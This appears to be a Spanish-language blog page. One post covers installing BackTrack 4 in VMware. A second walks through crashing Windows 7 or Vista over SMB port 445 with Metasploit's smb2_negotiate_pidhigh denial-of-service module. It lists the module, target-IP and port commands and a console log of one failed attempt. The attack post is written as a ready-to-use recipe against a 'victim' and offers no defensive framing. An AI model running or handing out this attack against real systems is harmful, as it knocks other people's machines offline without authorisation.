Instalar Backtrack 4 en VMware Workstation
Aquí tenéis un vídeo tutorial de como instalar Backtrack 4 en VMware Workstation. El problema con el que me encontré cuando hice la instalación, es que una vez ejecutado el SO y antes de lanzar startx, no me aparecía ningún mensaje como en este vídeo tutorial advirtiéndome de que tenia que activar los dispositivos de red con el comando ./etc/init.d/networking start. Con lo cual, una vez lanzado el startx me encontrare que no tenia conexión a Internet. Imagino que la versión de Backtrack utilizada en el vídeo es diferente a la que yo uso. Ya que yo me baje la Backtrack 4 Final Release VMware Image desde aquí y en el vídeo hacen la instalación manual en VMware creo que con esta version de Backtrack 4 que en teoría debería ser la misma.
Aquí os dejo el vídeo.
Artículos relacionados:
Reventando un Windows 7 con Metasploit
Para reventar o colgar un sistema windows 7 Ultimate con metasploit, primero deberemos asegurarnos que tiene el puerto 445/tcp netbios-ssn abierto, si este es el caso, lo demás es coser y cantar.
En la consola de metasploit, escribiremos el comando para usar el smb_negotiate_pidhigh :
msf> use auxiliary/dos/windows/smb/smb2_negotiate_pidhigh
A continuación determinamos la IP de la victima con el comando set RHOST «victima ip» . ( en este caso utilizaremos una ip ficticia que sera 192.168.0.5 )
msf auxiliary(smb2_negotiate_pidhigh) > set RHOST 192.168.0.5
Despues le indicamos cual es el puerto que vamos a utilizar para el ataque, utilizando el comando set RPORT en este caso sera el 445
msf auxiliary(smb2_negotiate_pidhigh) > set RPORT 445
Y por ultimo lanzamos el ataque con el comando run y a esperar a que se cuelgue el sistema.
msf auxiliary(smb2_negotiate_pidhigh) > run
Aquí os dejo un vídeo donde se ejecutan todos los comandos paso a paso.
Aqui os dejo el resultado de un ataque frustrado contra un Windows Vista Home Premium Service Pack 1
msf > use auxiliary/dos/windows/smb/smb2_negotiate_pidhigh
msf auxiliary(smb2_negotiate_pidhigh) > set RHOST 192.168.1.35
RHOST => 192.168.1.35
msf auxiliary(smb2_negotiate_pidhigh) > set RPORT 445
RPORT => 445
msf auxiliary(smb2_negotiate_pidhigh) > run[*] Sending request and waiting for a reply…
[*] Response received: “000000\236\376SMB@0000000000000000000100010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000A00010002020000\37621\321}\256\211\216D\226Ki03A3452601000000000001000000010000000100\320\252Q{\241\321\31201\276/K\361P\276\31201\200003600 LM `340606+0601050502\24022020\240160\f06\n+06010401\20270202\n”
[*] Auxiliary module execution completed
msf auxiliary(smb2_negotiate_pidhigh) >
Artículos relacionados:
Categorías
Posts Más Vistos
Mandame tus cositas
L | M | X | J | V | S | D |
---|---|---|---|---|---|---|
1 | 2 | 3 | 4 | 5 | ||
6 | 7 | 8 | 9 | 10 | 11 | 12 |
13 | 14 | 15 | 16 | 17 | 18 | 19 |
20 | 21 | 22 | 23 | 24 | 25 | 26 |
27 | 28 | 29 | 30 | 31 |